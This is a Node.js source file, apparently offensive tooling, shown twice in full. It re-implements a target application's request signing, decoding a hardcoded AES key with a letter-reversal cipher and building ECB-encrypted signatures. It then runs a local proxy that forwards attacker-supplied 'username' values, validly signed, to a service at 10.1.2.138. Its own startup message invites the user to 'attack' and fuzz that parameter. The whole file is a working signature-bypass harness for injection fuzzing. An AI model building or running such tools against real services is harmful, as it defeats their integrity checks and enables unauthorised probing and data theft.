sharpicx/server.js

## server.js
var CryptoJS = require("crypto-js");
var http = require("http");
var axios = require("axios");
const { URLSearchParams } = require("url");

let alphabet = "abcdefghijklmnopqrstuvwxyz";
let fixedKey = "zyxwvutsrqponmlkjihgfedcba";

function isUpperCase(letter) {
    let charCode = letter.charCodeAt(0);
    if(charCode >= 65 && charCode <= 90) {
        return true;
    } else {
        return false;
    }
}

function isLowerCase(letter) {
    let charCode = letter.charCodeAt(0);
    if(charCode >= 97 && charCode <= 122) {
        return true;
    } else {
        return false;
    }
}

function encrypt(text) {
    let encrypted = "";
    for (let i = 0; i < text.length; i++) {
        let index = 0;

        if(isUpperCase(text[i])) {
            let reversedIndex = 0;

            let lower = text[i].toLowerCase();
            index = fixedKey.indexOf(lower);

            if(index < 0 && index >= -27) {
                reversedIndex = index * (-1);
            } else {
                reversedIndex = index;
            }

            let tempIndex = reversedIndex - 1 - 24;
            if(tempIndex < 0) {
                tempIndex = tempIndex * (-1);
            } else {
                tempIndex = tempIndex;
            }

            let reversedChar = fixedKey[tempIndex];

            encrypted +=reversedChar.toUpperCase();
        } else if(isLowerCase(text[i])) {
            let reversedIndex = 0;

            let lower = text[i].toLowerCase();
            index = fixedKey.indexOf(lower);

            if(index < 0 && index >= -27) {
                reversedIndex = index * (-1);
            } else {
                reversedIndex = index;
            }

            let tempIndex = reversedIndex - 1 - 24;
            if(tempIndex < 0) {
                tempIndex = tempIndex * (-1);
            } else {
                tempIndex = tempIndex;
            }

            let reversedChar = fixedKey[tempIndex];
            encrypted += reversedChar;
        } else {
            encrypted += text[i];
        }
    }
    return encrypted;
}

function getKey(){
    var key = encrypt("W3e1oT0wRhHlVzab");

    return key;
}

function Encrypt(raw){
    const text = CryptoJS.enc.Utf8.parse(raw);
    const key = CryptoJS.enc.Utf8.parse(getKey());
    var encrypted = CryptoJS.AES.encrypt(text, key, { mode: CryptoJS.mode.ECB, padding: CryptoJS.pad.Pkcs7 });
    encrypted = encrypted.ciphertext.toString(CryptoJS.enc.Base64);
    return encrypted;
}
function a(){
    var b = new Date();
    var c = b.toISOString();
    return c;
}
function b() {
    var a           = '';
    var b       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    var c = b.length;
    for ( var i = 0; i < 20; i++ ) {
        a += b.charAt(Math.floor(Math.random() * c));
    }
    return a;
}

//const username = process.argv[2];
var date_iso = a();
var authorize = b();
//const x = Encrypt(username.concat("&", date_iso, "&", authorize));

const server = http.createServer(async (req, res) => {
	const target = "http://10.1.2.138:8050/profile/getData"
	const urlParams = new URLSearchParams(req.url.slice(1));
	const username = urlParams.get('username');
	const x = Encrypt(username.concat("&", date_iso, "&", authorize));

	try {
		const headers = {
			'X-Timestamp': date_iso,
			'Signature': x,
			'Authorization': authorize,
			'Content-Type': 'application/x-www-form-urlencoded'
		}
		const data = new URLSearchParams();
		data.append('username', username);

		axios.post(
			target, data.toString(), { headers: headers
		})
		.then(response => {
			console.log(`[*] sent!\nrequest: ${username}\n`);
			res.statusCode = response.status;
			res.setHeader('Content-Type', 'text/plain');
			res.write(JSON.stringify(response.data));
			res.end();

		})
		.catch(error => {
			res.statusCode = 500;
			res.setHeader('Content-Type', 'text/plain');
			res.write(error.response.data);
			res.end();
		})
	} catch (err) {
		res.statusCode = 500;
		res.setHeader('Content-Type', 'text/plain');
		res.end(`Error: ${err.message}`);
	}
});

const port = 8000;

server.listen(port, () => {
  console.log('go attack it at: http://127.0.0.1:8000/?username=FUZZ');
});
	var CryptoJS = require("crypto-js");
	var http = require("http");
	var axios = require("axios");
	const { URLSearchParams } = require("url");

	let alphabet = "abcdefghijklmnopqrstuvwxyz";
	let fixedKey = "zyxwvutsrqponmlkjihgfedcba";

	function isUpperCase(letter) {
	let charCode = letter.charCodeAt(0);
	if(charCode >= 65 && charCode <= 90) {
	return true;
	} else {
	return false;
	}
	}

	function isLowerCase(letter) {
	let charCode = letter.charCodeAt(0);
	if(charCode >= 97 && charCode <= 122) {
	return true;
	} else {
	return false;
	}
	}

	function encrypt(text) {
	let encrypted = "";
	for (let i = 0; i < text.length; i++) {
	let index = 0;

	if(isUpperCase(text[i])) {
	let reversedIndex = 0;

	let lower = text[i].toLowerCase();
	index = fixedKey.indexOf(lower);

	if(index < 0 && index >= -27) {
	reversedIndex = index * (-1);
	} else {
	reversedIndex = index;
	}

	let tempIndex = reversedIndex - 1 - 24;
	if(tempIndex < 0) {
	tempIndex = tempIndex * (-1);
	} else {
	tempIndex = tempIndex;
	}

	let reversedChar = fixedKey[tempIndex];

	encrypted +=reversedChar.toUpperCase();
	} else if(isLowerCase(text[i])) {
	let reversedIndex = 0;

	let lower = text[i].toLowerCase();
	index = fixedKey.indexOf(lower);

	if(index < 0 && index >= -27) {
	reversedIndex = index * (-1);
	} else {
	reversedIndex = index;
	}

	let tempIndex = reversedIndex - 1 - 24;
	if(tempIndex < 0) {
	tempIndex = tempIndex * (-1);
	} else {
	tempIndex = tempIndex;
	}

	let reversedChar = fixedKey[tempIndex];
	encrypted += reversedChar;
	} else {
	encrypted += text[i];
	}
	}
	return encrypted;
	}

	function getKey(){
	var key = encrypt("W3e1oT0wRhHlVzab");

	return key;
	}

	function Encrypt(raw){
	const text = CryptoJS.enc.Utf8.parse(raw);
	const key = CryptoJS.enc.Utf8.parse(getKey());
	var encrypted = CryptoJS.AES.encrypt(text, key, { mode: CryptoJS.mode.ECB, padding: CryptoJS.pad.Pkcs7 });
	encrypted = encrypted.ciphertext.toString(CryptoJS.enc.Base64);
	return encrypted;
	}
	function a(){
	var b = new Date();
	var c = b.toISOString();
	return c;
	}
	function b() {
	var a = '';
	var b = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
	var c = b.length;
	for ( var i = 0; i < 20; i++ ) {
	a += b.charAt(Math.floor(Math.random() * c));
	}
	return a;
	}

	//const username = process.argv[2];
	var date_iso = a();
	var authorize = b();
	//const x = Encrypt(username.concat("&", date_iso, "&", authorize));

	const server = http.createServer(async (req, res) => {
	const target = "http://10.1.2.138:8050/profile/getData"
	const urlParams = new URLSearchParams(req.url.slice(1));
	const username = urlParams.get('username');
	const x = Encrypt(username.concat("&", date_iso, "&", authorize));

	try {
	const headers = {
	'X-Timestamp': date_iso,
	'Signature': x,
	'Authorization': authorize,
	'Content-Type': 'application/x-www-form-urlencoded'
	}
	const data = new URLSearchParams();
	data.append('username', username);

	axios.post(
	target, data.toString(), { headers: headers
	})
	.then(response => {
	console.log(`[*] sent!\nrequest: ${username}\n`);
	res.statusCode = response.status;
	res.setHeader('Content-Type', 'text/plain');
	res.write(JSON.stringify(response.data));
	res.end();

	})
	.catch(error => {
	res.statusCode = 500;
	res.setHeader('Content-Type', 'text/plain');
	res.write(error.response.data);
	res.end();
	})
	} catch (err) {
	res.statusCode = 500;
	res.setHeader('Content-Type', 'text/plain');
	res.end(`Error: ${err.message}`);
	}
	});

	const port = 8000;

	server.listen(port, () => {
	console.log('go attack it at: http://127.0.0.1:8000/?username=FUZZ');
	});